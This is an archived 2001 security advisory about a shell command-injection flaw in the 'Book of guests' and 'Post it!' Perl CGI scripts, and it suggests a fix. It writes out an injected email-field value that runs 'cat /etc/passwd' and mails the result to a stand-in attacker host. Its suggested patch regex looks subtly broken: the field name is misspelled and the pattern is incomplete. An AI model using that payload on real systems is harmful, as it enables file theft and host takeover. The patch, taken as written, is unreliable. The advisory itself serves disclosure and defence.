Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Guestbooks :: web4837.htm

Book of guest & Post it!



2nd Nov 2001 [SBWID-4837]
COMMAND

	Book of guest & Post it!

SYSTEMS AFFECTED

	

PROBLEM

	David Kumme found following, in Seth Leonard\'s Book of guests and  Post
	it! CGIs, available at http://www.dreamcatchersweb.com/scripts/.
	

	The problem is that this script doesn\'t filter out  ANY  metacharacters
	from the input and pass it to the shell. Therefore by writing  something
	like  email@mail.com;cat  /etc/passwd|mail  evil@evilhost.com  into  the
	email field,  the attacker could take control over the host.
	

	

SOLUTION

	patch:
	

	first of all it isn\'t a bad idea to set the permissions of  the  script
	corectly. Furthermore the line if ($INPUT{\'email\'} =~  /(.*)@(.*)/)  {
	... } should be replaced  by  something  like  if  ($INPUT{\'emai\'}  =~
	/^[\\w-.]+\\@[\\w-.]) { ... }
	

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH